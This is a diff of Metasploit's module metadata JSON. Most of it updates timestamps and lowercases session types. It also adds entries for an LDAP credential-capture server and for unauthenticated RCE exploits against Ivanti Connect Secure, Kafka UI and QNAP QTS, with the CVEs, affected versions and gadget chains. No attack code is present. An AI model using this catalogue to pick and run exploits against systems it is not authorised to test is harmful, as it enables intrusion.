"mod_time": "2023-11-27 13:29:43 +0000",
|
||||
"mod_time": "2024-02-02 14:26:43 +0000",
|
||||
"path": "/modules/auxiliary/admin/smb/delete_file.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "admin/smb/delete_file",
|
||||
@@ -9966,7 +9990,7 @@
|
||||
"notes": {
|
||||
},
|
||||
"session_types": [
|
||||
"SMB"
|
||||
"smb"
|
||||
],
|
||||
"needs_cleanup": false,
|
||||
"actions": [
|
||||
@@ -10001,7 +10025,7 @@
|
||||
"microsoft-ds"
|
||||
],
|
||||
"targets": null,
|
||||
"mod_time": "2023-11-27 14:25:47 +0000",
|
||||
"mod_time": "2024-02-02 14:26:43 +0000",
|
||||
"path": "/modules/auxiliary/admin/smb/download_file.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "admin/smb/download_file",
|
||||
@@ -10011,7 +10035,7 @@
|
||||
"notes": {
|
||||
},
|
||||
"session_types": [
|
||||
"SMB"
|
||||
"smb"
|
||||
],
|
||||
"needs_cleanup": false,
|
||||
"actions": [
|
||||
@@ -10149,7 +10173,7 @@
|
||||
"microsoft-ds"
|
||||
],
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-15 12:07:07 +0000",
|
||||
"mod_time": "2024-02-02 14:26:43 +0000",
|
||||
"path": "/modules/auxiliary/admin/smb/psexec_ntdsgrab.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "admin/smb/psexec_ntdsgrab",
|
||||
@@ -10159,7 +10183,7 @@
|
||||
"notes": {
|
||||
},
|
||||
"session_types": [
|
||||
"SMB"
|
||||
"smb"
|
||||
],
|
||||
"needs_cleanup": false,
|
||||
"actions": [
|
||||
@@ -10240,7 +10264,7 @@
|
||||
"microsoft-ds"
|
||||
],
|
||||
"targets": null,
|
||||
"mod_time": "2023-11-27 14:55:24 +0000",
|
||||
"mod_time": "2024-02-02 14:26:43 +0000",
|
||||
"path": "/modules/auxiliary/admin/smb/upload_file.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "admin/smb/upload_file",
|
||||
@@ -10250,7 +10274,7 @@
|
||||
"notes": {
|
||||
},
|
||||
"session_types": [
|
||||
"SMB"
|
||||
"smb"
|
||||
],
|
||||
"needs_cleanup": false,
|
||||
"actions": [
|
||||
@@ -22828,7 +22852,7 @@
|
||||
"sybase"
|
||||
],
|
||||
"targets": null,
|
||||
"mod_time": "2023-12-12 09:53:37 +0000",
|
||||
"mod_time": "2024-02-13 13:00:38 +0000",
|
||||
"path": "/modules/auxiliary/gather/lansweeper_collector.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "gather/lansweeper_collector",
|
||||
@@ -25902,7 +25926,7 @@
|
||||
"microsoft-ds"
|
||||
],
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-15 12:07:07 +0000",
|
||||
"mod_time": "2024-02-02 14:26:43 +0000",
|
||||
"path": "/modules/auxiliary/gather/windows_secrets_dump.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "gather/windows_secrets_dump",
|
||||
@@ -25921,7 +25945,7 @@
|
||||
]
|
||||
},
|
||||
"session_types": [
|
||||
"SMB"
|
||||
"smb"
|
||||
],
|
||||
"needs_cleanup": false,
|
||||
"actions": [
|
||||
@@ -46634,7 +46658,7 @@
|
||||
"sybase"
|
||||
],
|
||||
"targets": null,
|
||||
"mod_time": "2023-12-12 09:53:37 +0000",
|
||||
"mod_time": "2024-02-19 10:34:16 +0000",
|
||||
"path": "/modules/auxiliary/scanner/mssql/mssql_hashdump.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "scanner/mssql/mssql_hashdump",
|
||||
@@ -46643,7 +46667,9 @@
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"session_types": [
|
||||
"mssql"
|
||||
],
|
||||
"needs_cleanup": false,
|
||||
"actions": [
|
||||
|
||||
@@ -46683,7 +46709,7 @@
|
||||
"sybase"
|
||||
],
|
||||
"targets": null,
|
||||
"mod_time": "2023-12-12 09:53:37 +0000",
|
||||
"mod_time": "2024-02-19 16:10:37 +0000",
|
||||
"path": "/modules/auxiliary/scanner/mssql/mssql_login.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "scanner/mssql/mssql_login",
|
||||
@@ -46781,7 +46807,7 @@
|
||||
"sybase"
|
||||
],
|
||||
"targets": null,
|
||||
"mod_time": "2023-12-12 09:53:37 +0000",
|
||||
"mod_time": "2024-02-19 10:34:16 +0000",
|
||||
"path": "/modules/auxiliary/scanner/mssql/mssql_schemadump.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "scanner/mssql/mssql_schemadump",
|
||||
@@ -46790,7 +46816,9 @@
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"session_types": [
|
||||
"mssql"
|
||||
],
|
||||
"needs_cleanup": false,
|
||||
"actions": [
|
||||
|
||||
@@ -46825,7 +46853,7 @@
|
||||
|
||||
],
|
||||
"targets": null,
|
||||
"mod_time": "2023-10-12 17:39:47 +0000",
|
||||
"mod_time": "2024-02-05 16:45:52 +0000",
|
||||
"path": "/modules/auxiliary/scanner/mysql/mysql_authbypass_hashdump.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "scanner/mysql/mysql_authbypass_hashdump",
|
||||
@@ -46867,7 +46895,7 @@
|
||||
|
||||
],
|
||||
"targets": null,
|
||||
"mod_time": "2023-08-17 19:07:28 +0000",
|
||||
"mod_time": "2024-02-19 10:34:16 +0000",
|
||||
"path": "/modules/auxiliary/scanner/mysql/mysql_file_enum.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "scanner/mysql/mysql_file_enum",
|
||||
@@ -46876,7 +46904,9 @@
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"session_types": [
|
||||
"mysql"
|
||||
],
|
||||
"needs_cleanup": false,
|
||||
"actions": [
|
||||
|
||||
@@ -46908,7 +46938,7 @@
|
||||
|
||||
],
|
||||
"targets": null,
|
||||
"mod_time": "2021-09-07 10:01:17 +0000",
|
||||
"mod_time": "2024-02-19 10:34:16 +0000",
|
||||
"path": "/modules/auxiliary/scanner/mysql/mysql_hashdump.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "scanner/mysql/mysql_hashdump",
|
||||
@@ -46917,7 +46947,9 @@
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"session_types": [
|
||||
"mysql"
|
||||
],
|
||||
"needs_cleanup": false,
|
||||
"actions": [
|
||||
|
||||
@@ -46949,7 +46981,7 @@
|
||||
|
||||
],
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-17 15:35:47 +0000",
|
||||
"mod_time": "2024-02-16 19:20:02 +0000",
|
||||
"path": "/modules/auxiliary/scanner/mysql/mysql_login.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "scanner/mysql/mysql_login",
|
||||
@@ -46990,7 +47022,7 @@
|
||||
|
||||
],
|
||||
"targets": null,
|
||||
"mod_time": "2017-07-24 06:26:21 +0000",
|
||||
"mod_time": "2024-02-19 10:34:16 +0000",
|
||||
"path": "/modules/auxiliary/scanner/mysql/mysql_schemadump.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "scanner/mysql/mysql_schemadump",
|
||||
@@ -46999,7 +47031,9 @@
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"session_types": [
|
||||
"mysql"
|
||||
],
|
||||
"needs_cleanup": false,
|
||||
"actions": [
|
||||
|
||||
@@ -47031,7 +47065,7 @@
|
||||
|
||||
],
|
||||
"targets": null,
|
||||
"mod_time": "2017-07-24 06:26:21 +0000",
|
||||
"mod_time": "2024-02-14 15:26:34 +0000",
|
||||
"path": "/modules/auxiliary/scanner/mysql/mysql_version.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "scanner/mysql/mysql_version",
|
||||
@@ -47040,7 +47074,9 @@
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"session_types": [
|
||||
"mysql"
|
||||
],
|
||||
"needs_cleanup": false,
|
||||
"actions": [
|
||||
|
||||
@@ -47072,7 +47108,7 @@
|
||||
|
||||
],
|
||||
"targets": null,
|
||||
"mod_time": "2023-08-17 19:07:28 +0000",
|
||||
"mod_time": "2024-02-19 10:34:16 +0000",
|
||||
"path": "/modules/auxiliary/scanner/mysql/mysql_writable_dirs.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "scanner/mysql/mysql_writable_dirs",
|
||||
@@ -47081,7 +47117,9 @@
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"session_types": [
|
||||
"mysql"
|
||||
],
|
||||
"needs_cleanup": false,
|
||||
"actions": [
|
||||
|
||||
@@ -49054,7 +49092,7 @@
|
||||
"postgres"
|
||||
],
|
||||
"targets": null,
|
||||
"mod_time": "2017-07-24 06:26:21 +0000",
|
||||
"mod_time": "2024-02-19 10:34:16 +0000",
|
||||
"path": "/modules/auxiliary/scanner/postgres/postgres_hashdump.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "scanner/postgres/postgres_hashdump",
|
||||
@@ -49063,7 +49101,9 @@
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"session_types": [
|
||||
"postgresql"
|
||||
],
|
||||
"needs_cleanup": false,
|
||||
"actions": [
|
||||
|
||||
@@ -49097,7 +49137,7 @@
|
||||
"postgres"
|
||||
],
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-30 16:38:00 +0000",
|
||||
"mod_time": "2024-02-14 12:20:06 +0000",
|
||||
"path": "/modules/auxiliary/scanner/postgres/postgres_login.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "scanner/postgres/postgres_login",
|
||||
@@ -49138,7 +49178,7 @@
|
||||
"postgres"
|
||||
],
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-15 15:21:13 +0000",
|
||||
"mod_time": "2024-02-02 14:26:43 +0000",
|
||||
"path": "/modules/auxiliary/scanner/postgres/postgres_schemadump.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "scanner/postgres/postgres_schemadump",
|
||||
@@ -49148,7 +49188,7 @@
|
||||
"notes": {
|
||||
},
|
||||
"session_types": [
|
||||
"PostgreSQL"
|
||||
"postgresql"
|
||||
],
|
||||
"needs_cleanup": false,
|
||||
"actions": [
|
||||
@@ -49181,7 +49221,7 @@
|
||||
"postgres"
|
||||
],
|
||||
"targets": null,
|
||||
"mod_time": "2022-01-23 15:28:32 +0000",
|
||||
"mod_time": "2024-02-14 15:26:34 +0000",
|
||||
"path": "/modules/auxiliary/scanner/postgres/postgres_version.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "scanner/postgres/postgres_version",
|
||||
@@ -49190,7 +49230,9 @@
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"session_types": [
|
||||
"postgresql"
|
||||
],
|
||||
"needs_cleanup": false,
|
||||
"actions": [
|
||||
|
||||
@@ -53161,7 +53203,7 @@
|
||||
"microsoft-ds"
|
||||
],
|
||||
"targets": null,
|
||||
"mod_time": "2023-11-30 14:07:03 +0000",
|
||||
"mod_time": "2024-02-02 14:26:43 +0000",
|
||||
"path": "/modules/auxiliary/scanner/smb/pipe_auditor.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "scanner/smb/pipe_auditor",
|
||||
@@ -53171,7 +53213,7 @@
|
||||
"notes": {
|
||||
},
|
||||
"session_types": [
|
||||
"SMB"
|
||||
"smb"
|
||||
],
|
||||
"needs_cleanup": false,
|
||||
"actions": [
|
||||
@@ -53206,7 +53248,7 @@
|
||||
"microsoft-ds"
|
||||
],
|
||||
"targets": null,
|
||||
"mod_time": "2023-11-30 14:07:03 +0000",
|
||||
"mod_time": "2024-02-02 14:26:43 +0000",
|
||||
"path": "/modules/auxiliary/scanner/smb/pipe_dcerpc_auditor.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "scanner/smb/pipe_dcerpc_auditor",
|
||||
@@ -53216,7 +53258,7 @@
|
||||
"notes": {
|
||||
},
|
||||
"session_types": [
|
||||
"SMB"
|
||||
"smb"
|
||||
],
|
||||
"needs_cleanup": false,
|
||||
"actions": [
|
||||
@@ -53302,7 +53344,7 @@
|
||||
"microsoft-ds"
|
||||
],
|
||||
"targets": null,
|
||||
"mod_time": "2023-12-05 14:15:28 +0000",
|
||||
"mod_time": "2024-02-02 14:26:43 +0000",
|
||||
"path": "/modules/auxiliary/scanner/smb/smb_enum_gpp.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "scanner/smb/smb_enum_gpp",
|
||||
@@ -53312,7 +53354,7 @@
|
||||
"notes": {
|
||||
},
|
||||
"session_types": [
|
||||
"SMB"
|
||||
"smb"
|
||||
],
|
||||
"needs_cleanup": false,
|
||||
"actions": [
|
||||
@@ -53352,7 +53394,7 @@
|
||||
"microsoft-ds"
|
||||
],
|
||||
"targets": null,
|
||||
"mod_time": "2023-11-30 14:07:03 +0000",
|
||||
"mod_time": "2024-02-02 14:26:43 +0000",
|
||||
"path": "/modules/auxiliary/scanner/smb/smb_enumshares.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "scanner/smb/smb_enumshares",
|
||||
@@ -53362,7 +53404,7 @@
|
||||
"notes": {
|
||||
},
|
||||
"session_types": [
|
||||
"SMB"
|
||||
"smb"
|
||||
],
|
||||
"needs_cleanup": false,
|
||||
"actions": [
|
||||
@@ -53397,7 +53439,7 @@
|
||||
"microsoft-ds"
|
||||
],
|
||||
"targets": null,
|
||||
"mod_time": "2023-11-30 14:07:03 +0000",
|
||||
"mod_time": "2024-02-02 14:26:43 +0000",
|
||||
"path": "/modules/auxiliary/scanner/smb/smb_enumusers.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "scanner/smb/smb_enumusers",
|
||||
@@ -53407,7 +53449,7 @@
|
||||
"notes": {
|
||||
},
|
||||
"session_types": [
|
||||
"SMB"
|
||||
"smb"
|
||||
],
|
||||
"needs_cleanup": false,
|
||||
"actions": [
|
||||
@@ -53443,7 +53485,7 @@
|
||||
"microsoft-ds"
|
||||
],
|
||||
"targets": null,
|
||||
"mod_time": "2023-11-30 14:07:03 +0000",
|
||||
"mod_time": "2024-02-02 14:26:43 +0000",
|
||||
"path": "/modules/auxiliary/scanner/smb/smb_enumusers_domain.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "scanner/smb/smb_enumusers_domain",
|
||||
@@ -53453,7 +53495,7 @@
|
||||
"notes": {
|
||||
},
|
||||
"session_types": [
|
||||
"SMB"
|
||||
"smb"
|
||||
],
|
||||
"needs_cleanup": false,
|
||||
"actions": [
|
||||
@@ -53491,7 +53533,7 @@
|
||||
"microsoft-ds"
|
||||
],
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-30 16:38:00 +0000",
|
||||
"mod_time": "2024-02-06 15:06:25 +0000",
|
||||
"path": "/modules/auxiliary/scanner/smb/smb_login.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "scanner/smb/smb_login",
|
||||
@@ -53534,7 +53576,7 @@
|
||||
"microsoft-ds"
|
||||
],
|
||||
"targets": null,
|
||||
"mod_time": "2023-11-30 14:07:03 +0000",
|
||||
"mod_time": "2024-02-02 14:26:43 +0000",
|
||||
"path": "/modules/auxiliary/scanner/smb/smb_lookupsid.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "scanner/smb/smb_lookupsid",
|
||||
@@ -53544,7 +53586,7 @@
|
||||
"notes": {
|
||||
},
|
||||
"session_types": [
|
||||
"SMB"
|
||||
"smb"
|
||||
],
|
||||
"needs_cleanup": false,
|
||||
"actions": [
|
||||
@@ -58105,6 +58147,59 @@
|
||||
}
|
||||
]
|
||||
},
|
||||
"auxiliary_server/capture/ldap": {
|
||||
"name": "Authentication Capture: LDAP",
|
||||
"fullname": "auxiliary/server/capture/ldap",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "auxiliary",
|
||||
"author": [
|
||||
"JustAnda7"
|
||||
],
|
||||
"description": "This module mocks an LDAP service to capture authentication\n information of a client trying to authenticate against an LDAP service",
|
||||
"references": [
|
||||
|
||||
],
|
||||
"platform": "",
|
||||
"arch": "",
|
||||
"rport": null,
|
||||
"autofilter_ports": [
|
||||
|
||||
],
|
||||
"autofilter_services": [
|
||||
|
||||
],
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-23 12:13:24 +0000",
|
||||
"path": "/modules/auxiliary/server/capture/ldap.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "server/capture/ldap",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
"Stability": [
|
||||
|
||||
],
|
||||
"Reliability": [
|
||||
|
||||
],
|
||||
"SideEffects": [
|
||||
|
||||
]
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"actions": [
|
||||
{
|
||||
"name": "Capture",
|
||||
"description": "Run an LDAP capture server"
|
||||
}
|
||||
]
|
||||
},
|
||||
"auxiliary_server/capture/mssql": {
|
||||
"name": "Authentication Capture: MSSQL",
|
||||
"fullname": "auxiliary/server/capture/mssql",
|
||||
@@ -61592,6 +61687,40 @@
|
||||
|
||||
]
|
||||
},
|
||||
"encoder_cmd/base64": {
|
||||
"name": "Base64 Command Encoder",
|
||||
"fullname": "encoder/cmd/base64",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 400,
|
||||
"disclosure_date": null,
|
||||
"type": "encoder",
|
||||
"author": [
|
||||
"Spencer McIntyre"
|
||||
],
|
||||
"description": "This encoder uses base64 encoding to avoid bad characters.",
|
||||
"references": [
|
||||
|
||||
],
|
||||
"platform": "BSD,BSDi,Linux,OSX,Solaris,Unix",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-02-12 14:02:51 +0000",
|
||||
"path": "/modules/encoders/cmd/base64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/base64",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false
|
||||
},
|
||||
"encoder_cmd/brace": {
|
||||
"name": "Bash Brace Expansion Command Encoder",
|
||||
"fullname": "encoder/cmd/brace",
|
||||
@@ -66642,14 +66771,18 @@
|
||||
"type": "exploit",
|
||||
"author": [
|
||||
"Alvaro Muñoz",
|
||||
"wvu <wvu@metasploit.com>"
|
||||
"wvu <wvu@metasploit.com>",
|
||||
"h00die"
|
||||
],
|
||||
"description": "This module exploits a Java deserialization vulnerability in Apache\n OFBiz's unauthenticated XML-RPC endpoint /webtools/control/xmlrpc for\n versions prior to 17.12.04.",
|
||||
"description": "This module exploits a Java deserialization vulnerability in Apache\n OFBiz's unauthenticated XML-RPC endpoint /webtools/control/xmlrpc for\n versions prior to 17.12.01 using the ROME gadget chain.\n\n Versions up to 18.12.11 are exploitable utilizing an auth bypass CVE-2023-51467\n and use the CommonsBeanutils1 gadget chain.\n\n Verified working on 18.12.09, 17.12.01, and 15.12",
|
||||
"references": [
|
||||
"CVE-2020-9496",
|
||||
"CVE-2023-49070",
|
||||
"CVE-2023-51467",
|
||||
"URL-https://securitylab.github.com/advisories/GHSL-2020-069-apache_ofbiz",
|
||||
"URL-https://ofbiz.apache.org/release-notes-17.12.04.html",
|
||||
"URL-https://issues.apache.org/jira/browse/OFBIZ-11716"
|
||||
"URL-https://issues.apache.org/jira/browse/OFBIZ-11716",
|
||||
"URL-https://blog.sonicwall.com/en-us/2023/12/sonicwall-discovers-critical-apache-ofbiz-zero-day-authbiz/"
|
||||
],
|
||||
"platform": "Linux,Unix",
|
||||
"arch": "cmd, x86, x64",
|
||||
@@ -66673,7 +66806,7 @@
|
||||
"Unix Command",
|
||||
"Linux Dropper"
|
||||
],
|
||||
"mod_time": "2021-03-31 08:54:37 +0000",
|
||||
"mod_time": "2024-02-06 16:45:02 +0000",
|
||||
"path": "/modules/exploits/linux/http/apache_ofbiz_deserialization.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "linux/http/apache_ofbiz_deserialization",
|
||||
@@ -72858,6 +72991,70 @@
|
||||
"session_types": false,
|
||||
"needs_cleanup": null
|
||||
},
|
||||
"exploit_linux/http/ivanti_connect_secure_rce_cve_2024_21893": {
|
||||
"name": "Ivanti Connect Secure Unauthenticated Remote Code Execution",
|
||||
"fullname": "exploit/linux/http/ivanti_connect_secure_rce_cve_2024_21893",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 600,
|
||||
"disclosure_date": "2024-01-31",
|
||||
"type": "exploit",
|
||||
"author": [
|
||||
"sfewer-r7"
|
||||
],
|
||||
"description": "This module chains a server side request forgery (SSRF) vulnerability (CVE-2024-21893) and a command injection\n vulnerability (CVE-2024-21887) to exploit vulnerable instances of either Ivanti Connect Secure or Ivanti\n Policy Secure, to achieve unauthenticated remote code execution. All currently supported versions 9.x and\n 22.x are vulnerable, prior to the vendor patch released on Feb 1, 2024. It is unknown if unsupported versions\n 8.x and below are also vulnerable.",
|
||||
"references": [
|
||||
"CVE-2024-21893",
|
||||
"CVE-2023-36661",
|
||||
"CVE-2024-21887",
|
||||
"URL-https://attackerkb.com/topics/FGlK1TVnB2/cve-2024-21893/rapid7-analysis",
|
||||
"URL-https://attackerkb.com/topics/AdUh6by52K/cve-2023-46805/rapid7-analysis",
|
||||
"URL-https://forums.ivanti.com/s/article/CVE-2024-21888-Privilege-Escalation-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure",
|
||||
"URL-https://shibboleth.net/community/advisories/secadv_20230612.txt"
|
||||
],
|
||||
"platform": "Linux,Unix",
|
||||
"arch": "cmd",
|
||||
"rport": 443,
|
||||
"autofilter_ports": [
|
||||
80,
|
||||
8080,
|
||||
443,
|
||||
8000,
|
||||
8888,
|
||||
8880,
|
||||
8008,
|
||||
3000,
|
||||
8443
|
||||
],
|
||||
"autofilter_services": [
|
||||
"http",
|
||||
"https"
|
||||
],
|
||||
"targets": [
|
||||
"Automatic"
|
||||
],
|
||||
"mod_time": "2024-02-09 09:26:08 +0000",
|
||||
"path": "/modules/exploits/linux/http/ivanti_connect_secure_rce_cve_2024_21893.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "linux/http/ivanti_connect_secure_rce_cve_2024_21893",
|
||||
"check": true,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
"Stability": [
|
||||
"crash-safe"
|
||||
],
|
||||
"Reliability": [
|
||||
"repeatable-session"
|
||||
],
|
||||
"SideEffects": [
|
||||
"ioc-in-logs"
|
||||
]
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": null
|
||||
},
|
||||
"exploit_linux/http/ivanti_csa_unauth_rce_cve_2021_44529": {
|
||||
"name": "Ivanti Cloud Services Appliance (CSA) Command Injection",
|
||||
"fullname": "exploit/linux/http/ivanti_csa_unauth_rce_cve_2021_44529",
|
||||
@@ -73050,6 +73247,68 @@
|
||||
"session_types": false,
|
||||
"needs_cleanup": null
|
||||
},
|
||||
"exploit_linux/http/kafka_ui_unauth_rce_cve_2023_52251": {
|
||||
"name": "Kafka UI Unauthenticated Remote Command Execution via the Groovy Filter option.",
|
||||
"fullname": "exploit/linux/http/kafka_ui_unauth_rce_cve_2023_52251",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 600,
|
||||
"disclosure_date": "2023-09-27",
|
||||
"type": "exploit",
|
||||
"author": [
|
||||
"h00die-gr3y <h00die.gr3y@gmail.com>",
|
||||
"BobTheShopLifter and Thingstad"
|
||||
],
|
||||
"description": "A command injection vulnerability exists in Kafka ui between `v0.4.0` and `v0.7.1` allowing\n an attacker to inject and execute arbitrary shell commands via the `groovy` filter parameter\n at the `topic` section.",
|
||||
"references": [
|
||||
"CVE-2023-52251",
|
||||
"URL-https://attackerkb.com/topics/ATJ1hTVB8H/cve-2023-52251",
|
||||
"URL-https://github.com/BobTheShoplifter/CVE-2023-52251-POC"
|
||||
],
|
||||
"platform": "Linux,Unix",
|
||||
"arch": "cmd, x64, x86",
|
||||
"rport": 8080,
|
||||
"autofilter_ports": [
|
||||
80,
|
||||
8080,
|
||||
443,
|
||||
8000,
|
||||
8888,
|
||||
8880,
|
||||
8008,
|
||||
3000,
|
||||
8443
|
||||
],
|
||||
"autofilter_services": [
|
||||
"http",
|
||||
"https"
|
||||
],
|
||||
"targets": [
|
||||
"Unix/Linux Command"
|
||||
],
|
||||
"mod_time": "2024-02-14 21:33:50 +0000",
|
||||
"path": "/modules/exploits/linux/http/kafka_ui_unauth_rce_cve_2023_52251.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "linux/http/kafka_ui_unauth_rce_cve_2023_52251",
|
||||
"check": true,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
"Stability": [
|
||||
"crash-safe"
|
||||
],
|
||||
"Reliability": [
|
||||
"repeatable-session"
|
||||
],
|
||||
"SideEffects": [
|
||||
"ioc-in-logs",
|
||||
"artifacts-on-disk"
|
||||
]
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": null
|
||||
},
|
||||
"exploit_linux/http/kaltura_unserialize_cookie_rce": {
|
||||
"name": "Kaltura Remote PHP Code Execution over Cookie",
|
||||
"fullname": "exploit/linux/http/kaltura_unserialize_cookie_rce",
|
||||
@@ -77573,6 +77832,68 @@
|
||||
"session_types": false,
|
||||
"needs_cleanup": null
|
||||
},
|
||||
"exploit_linux/http/qnap_qts_rce_cve_2023_47218": {
|
||||
"name": "QNAP QTS and QuTS Hero Unauthenticated Remote Code Execution in quick.cgi",
|
||||
"fullname": "exploit/linux/http/qnap_qts_rce_cve_2023_47218",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 600,
|
||||
"disclosure_date": "2024-02-13",
|
||||
"type": "exploit",
|
||||
"author": [
|
||||
"sfewer-r7",
|
||||
"Spencer McIntyre",
|
||||
"jheysel-r7"
|
||||
],
|
||||
"description": "There exists an unauthenticated command injection vulnerability in the QNAP operating system known as QTS and\n QuTS hero. QTS is a core part of the firmware for numerous QNAP entry and mid-level Network Attached Storage\n (NAS) devices, and QuTS hero is a core part of the firmware for numerous QNAP high-end and enterprise NAS devices.\n\n The vulnerable endpoint is the quick.cgi component, exposed by the device’s web based administration feature.\n The quick.cgi component is present in an uninitialized QNAP NAS device. This component is intended to be used\n during either manual or cloud based provisioning of a QNAP NAS device. Once a device has been successfully\n initialized, the quick.cgi component is disabled on the system.\n\n An attacker with network access to an uninitialized QNAP NAS device may perform unauthenticated command\n injection, allowing the attacker to execute arbitrary commands on the device.",
|
||||
"references": [
|
||||
"CVE-2023-47218",
|
||||
"URL-https://www.qnap.com/en/security-advisory/qsa-23-57",
|
||||
"URL-https://www.rapid7.com/blog/post/2024/02/13/cve-2023-47218-qnap-qts-and-quts-hero-unauthenticated-command-injection-fixed"
|
||||
],
|
||||
"platform": "Linux,Unix",
|
||||
"arch": "cmd",
|
||||
"rport": 80,
|
||||
"autofilter_ports": [
|
||||
80,
|
||||
8080,
|
||||
443,
|
||||
8000,
|
||||
8888,
|
||||
8880,
|
||||
8008,
|
||||
3000,
|
||||
8443
|
||||
],
|
||||
"autofilter_services": [
|
||||
"http",
|
||||
"https"
|
||||
],
|
||||
"targets": [
|
||||
"Default"
|
||||
],
|
||||
"mod_time": "2024-02-15 17:12:11 +0000",
|
||||
"path": "/modules/exploits/linux/http/qnap_qts_rce_cve_2023_47218.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "linux/http/qnap_qts_rce_cve_2023_47218",
|
||||
"check": true,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
"Stability": [
|
||||
"crash-safe"
|
||||
],
|
||||
"Reliability": [
|
||||
"repeatable-session"
|
||||
],
|
||||
"SideEffects": [
|
||||
"ioc-in-logs"
|
||||
]
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": true
|
||||
},
|
||||
"exploit_linux/http/raidsonic_nas_ib5220_exec_noauth": {
|
||||
"name": "Raidsonic NAS Devices Unauthenticated Remote Command Execution",
|
||||
"fullname": "exploit/linux/http/raidsonic_nas_ib5220_exec_noauth",
|
||||
@@ -86129,7 +86450,7 @@
|
||||
"systemd",
|
||||
"systemd user"
|
||||
],
|
||||
"mod_time": "2020-10-02 17:38:06 +0000",
|
||||
"mod_time": "2024-02-03 23:18:45 +0000",
|
||||
"path": "/modules/exploits/linux/local/service_persistence.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "linux/local/service_persistence",
|
||||
@@ -89753,7 +90074,7 @@
|
||||
"Linux x86",
|
||||
"Linux x86_64"
|
||||
],
|
||||
"mod_time": "2021-08-20 16:06:16 +0000",
|
||||
"mod_time": "2024-02-14 15:26:34 +0000",
|
||||
"path": "/modules/exploits/linux/postgres/postgres_payload.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "linux/postgres/postgres_payload",
|
||||
@@ -89762,8 +90083,13 @@
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": null
|
||||
"session_types": [
|
||||
"postgresql"
|
||||
],
|
||||
"needs_cleanup": null,
|
||||
"actions": [
|
||||
|
